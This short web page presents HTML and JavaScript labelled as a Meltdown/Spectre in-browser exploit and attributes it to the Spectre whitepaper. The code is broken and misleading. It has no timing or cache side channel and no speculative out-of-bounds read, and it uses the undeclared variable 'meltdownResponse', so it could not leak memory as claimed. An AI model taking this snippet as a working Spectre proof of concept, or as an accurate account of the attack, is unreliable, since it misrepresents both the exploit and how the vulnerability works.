Meltdown/Spectre Javascript In-Browser Exploit Example Code
From the spectre whitepaper: https://spectreattack.com/spectre.pdf Published here by https://luke.lol
by Luke Rehmann
HTML
<html>
<head>
<title>Meltdown/Spectre Javascript In-Browser Exploit</title>
</head>
<body>
<h1>
Meltdown/Spectre Javascript In-Browser Exploit
</h1>
<div id=spectreData>
Browser not exploitable.
</div>
<br />
<small>
@<a href=https://luke.lol>luke.lol</a>
</small>
</body>
</html>
JavaScript
var TABLE1_STRIDE = 1;
var TABLE1_BYTES = 3;
var probeTable = ['alpha', 'beta', 'corky'];
var simpleByteArray = [0x00, 0x01, 0x02];
var localJunk;
var index = 0;
if (index < simpleByteArray.length) {
index = simpleByteArray[index | 0];
index = (((index * TABLE1_STRIDE) | 0) & (TABLE1_BYTES - 1)) | 0;
meltdownResponse &= probeTable[index | 0] | 0;
}
document.getElementById("spectreData").innerHTML = meltdownResponse;